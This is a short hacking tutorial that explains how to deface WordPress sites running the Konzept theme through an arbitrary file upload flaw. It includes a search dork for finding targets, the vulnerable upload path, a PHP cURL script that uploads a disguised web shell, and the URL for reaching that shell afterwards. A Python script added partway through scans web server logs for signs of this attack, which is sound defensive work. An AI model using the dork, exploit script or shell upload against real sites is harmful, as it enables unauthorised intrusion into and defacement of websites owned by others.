This time I want to share how to deface using the WordPress Theme Konzept Arbitrary File Upload Vulnerability
Dork:
inurl:/wp-content/themes/konzept/
1. Dork in a search engine
exploit:
/wp-content/themes/konzept/includes/uploadify/upload.php
3. Vulnerability ~ {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
More or less like that :v
4. Create a new file with a .php extension, for example konzept.php, and save the script below in the directory C:/XAMPP/php. Edit the script a little, and put your shell in the same directory as konzept.php. *btw, change your shell's extension to .JPG first.
<?php
$url = "http://127.0.0.1"; // put URL Here
$post = array
(
"file" => "@namashell.jpg",
"name" => "namashell.php"
);
$ch = curl_init ("www.target.co.li/wp-content/themes/konzept/includes/uploadify/upload.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
5. Open your installed XAMPP and start Apache and MySQL.
6. Open CMD and type the commands
cd C:/xampp/php
php namaexploitlo.php
7. If it succeeds, the name of your shell will appear in CMD, and it will look like the screenshot.
8. Shell access: www.target.coli/wp-content/themes/konzept/includes/uploadify/uploads/namashell.php
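Seen from the site owner's side, the requests in the steps above leave a recognisable trail in the web server access log: a POST to the theme's upload.php, then requests for a script under its uploads/ directory. The following is an added example, not part of the original post, that scans access log lines for that trail; the function names and the log lines are constructed for illustration, and the log format is assumed to be Apache/nginx common or combined.

```python
import re
from urllib.parse import unquote

# Paths as given in the post above.
UPLOAD_ENDPOINT = "/wp-content/themes/konzept/includes/uploadify/upload.php"
UPLOAD_DIR = "/wp-content/themes/konzept/includes/uploadify/uploads/"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$")
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})\b')

def normalise(target):
    """Drop the query string, percent-decode, collapse '//' and lowercase."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).lower()

def scan(lines):
    """Return (kind, client_ip, timestamp, normalised_path) for each hit."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access log line we understand
        path = normalise(m["target"])
        if m["method"] == "POST" and path == UPLOAD_ENDPOINT:
            findings.append(("upload_post", m["ip"], m["ts"], path))
        elif path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
            # A script under an upload directory should never be served.
            kind = "script_served" if m["status"] == "200" else "script_probe"
            findings.append((kind, m["ip"], m["ts"], path))
    return findings

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2015:10:01:02 +0000] "GET /wp-content/themes/konzept/style.css HTTP/1.1" 200 5120',
    '203.0.113.9 - - [12/Mar/2015:10:02:11 +0000] "POST /wp-content/themes/konzept/includes/uploadify/upload.php HTTP/1.1" 200 52',
    '203.0.113.9 - - [12/Mar/2015:10:02:40 +0000] "GET /wp-content/themes/konzept/includes/uploadify/uploads/x.php HTTP/1.1" 200 812',
    '203.0.113.9 - - [12/Mar/2015:10:03:01 +0000] "GET /wp-content/themes/konzept/includes/uploadify/uploads/photo.jpg HTTP/1.1" 200 40211',
    '198.51.100.23 - - [12/Mar/2015:11:15:09 +0000] "GET /wp-content/themes/konzept//includes/uploadify/uploads/a%2Ephp?x=1 HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="  ")
```

A `script_served` hit means a script under the upload directory was returned with status 200; that directory should only ever serve static files, so any such hit warrants checking the directory's contents.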
Hope this is useful
Source: TKJ Cyber Art